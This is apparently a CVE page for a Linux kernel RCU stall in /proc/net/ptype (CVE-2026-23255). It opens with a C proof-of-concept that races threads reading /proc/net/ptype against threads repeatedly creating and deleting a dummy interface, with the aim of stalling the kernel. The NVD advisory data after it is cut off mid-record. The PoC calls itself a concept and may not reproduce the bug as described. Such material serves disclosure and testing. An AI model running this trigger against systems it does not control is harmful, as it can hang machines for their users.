CVE-2026-23255

#include <stdio.h> #include <pthread.h> #include <unistd.h> // PoC concept for CVE-2026-23255 - RCU stall in /proc/net/ptype // This demonstrates the race condition between reading ptype and concurrent modifications void *reader_thread(void *arg) { // Repeatedly read /proc/net/ptype to trigger seq_show while(1) { FILE *fp = fopen("/proc/net/ptype", "r"); if (fp) { char buffer[1024]; while (fgets(buffer, sizeof(buffer), fp)) { // Reading device names triggers ptype_seq_show() } fclose(fp); } usleep(100); // Small delay to increase race window } return NULL; } void *writer_thread(void *arg) { // Concurrent network device operations that modify ptype list // This triggers packet_type removal without proper RCU grace period while(1) { system("ip link del dummy0 2>/dev/null"); system("ip link add dummy0 type dummy"); system("ip link del dummy0"); usleep(50); } return NULL; } int main() { pthread_t r1, r2, w1, w2; // Create reader threads - simulate ptype_seq_show() access pthread_create(&r1, NULL, reader_thread, NULL); pthread_create(&r2, NULL, reader_thread, NULL); // Create writer threads - simulate concurrent packet_type modifications pthread_create(&w1, NULL, writer_thread, NULL); pthread_create(&w2, NULL, writer_thread, NULL); pthread_join(r1, NULL); pthread_join(r2, NULL); pthread_join(w1, NULL); pthread_join(w2, NULL); return 0; }

{"cve": {"id": "CVE-2026-23255", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T18:16:23.687", "lastModified": "2026-05-21T00:15:07.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: add proper RCU protection to /proc/net/ptype\n\nYin Fengwei reported an RCU stall in ptype_seq_show() and provided\na patch.\n\nReal issue is that ptype_seq_next() and ptype_seq_show() violate\nRCU rules.\n\nptype_seq_show() runs under rcu_read_lock(), and reads pt->dev\nto get device name without any barrier.\n\nAt the same time, concurrent writers can remove a packet_type structure\n(which is correctly freed after an RCU grace period) and clear pt->dev\nwithout an RCU grace period.\n\nDefine ptype_iter_state to carry a dev pointer along seq_net_private:\n\nstruct ptype_iter_state {\n\tstruct seq_net_private\tp;\n\tstruct net_device\t*dev; // added in this patch\n};\n\nWe need to record the device pointer in ptype_get_idx() and\nptype_seq_next() so that ptype_seq_show() is safe against\nconcurrent pt->dev changes.\n\nWe also need to add full RCU protection in ptype_seq_next().\n(Missing READ_ONCE() when reading list.next values)\n\nMany thanks to Dong Chenchen for providing a repro."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: añadir protección RCU adecuada a /proc/net/ptype\n\nYin Fengwei informó de un bloqueo RCU en ptype_seq_show() y proporcionó un parche.\n\nEl problema real es que ptype_seq_next() y ptype_seq_show() violan las reglas RCU.\n\nptype_seq_show() se ejecuta bajo rcu_read_lock(), y lee pt-&gt;dev para obtener el nombre del dispositivo sin ninguna barrera.\n\nAl mismo tiempo, los escritores concurrentes pueden eliminar una estructura packet_type (que se libera correctamente después de un período de gracia RCU) y borrar pt-&gt;dev sin un período de gracia RCU.\n\nDefinir ptype_iter_state para llevar un puntero dev junto con seq_net_private:\n\nstruct ptype_iter_state {\n\tstruct seq_net_private\tp;\n\tstruct net_device\t*dev; // añadido en este parche\n};\n\nNecesitamos registrar el puntero del dispositivo en ptype_get_idx() y ptype_seq_next() para que ptype_seq_show() esté a salvo de cambios concurrentes en pt-&gt;dev.\n\nTambién necesitamos añadir protección RCU completa en ptype_seq_next().\n(Falta READ_ONCE() al leer los valores de list.next)\n\nMuchas gracias a Dong Chenchen por proporcionar una reproducción."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "6.6.136", "matchCriteriaId": "E2D9D9DF-0F25-43D5-9C6A-4C891E3A29FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.10", "matchCriteriaId": "7156C23F-009E-4D05-838C-A2DA417B5B8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:*", "matchCriteriaId": "6F62EECE-8FB1-4D57-85D8-CB9E23CF313C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "matchCriteriaId": "4F76C298-81DC-43E4-8FC9-DC005A2116EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "matchCriteriaId": "0AB349B2-3F78-4197-882B-90ADB3BF645A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "matchCriteriaId": "6AC88830-A9BC-4607-B572-A4B502FC9FD0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "matchCriteriaId": "476CB3A5-D022-4F13-AAEF-CB6A5785516A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "m ... (truncated)